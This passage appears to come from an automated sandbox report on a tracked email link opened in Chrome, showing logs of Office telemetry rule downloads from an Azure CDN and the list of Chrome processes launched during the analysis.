                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            142192.168.2.45983213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:50 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                            x-ms-request-id: 71af9553-101e-00a2-14d2-2c9f2e000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120250Z-16547b76f7f9bs6dhC1DFWt3rg0000000kp0000000002m9v
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            143192.168.2.44978213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:51 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1407
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                            x-ms-request-id: dbae507e-301e-000c-7008-36323f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120251Z-1749fc9bdbdgs9sshC1DFWt6ws00000002p00000000034mu
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            144192.168.2.44981813.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC192OUTGET /rules/rule701701v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1423
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE245F1F4"
                                                                                                                                                                                                                                            x-ms-request-id: e3f4d157-601e-0001-4142-32faeb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120257Z-16547b76f7fp6mhthC1DFWrggn0000000kp000000000b2he
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC1423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 37 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 49 6e 74 65 6c 6c 69 67 65 6e 74 53 65 72 76 69 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701701" V="1" DC="SM" EN="Office.Telemetry.Event.Office.IntelligentServices.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusT


                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:07:01:29
                                                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:07:01:31
                                                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2020,i,2763923009184806423,6999701321909879304,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:07:01:34
                                                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238"
                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            No disassembly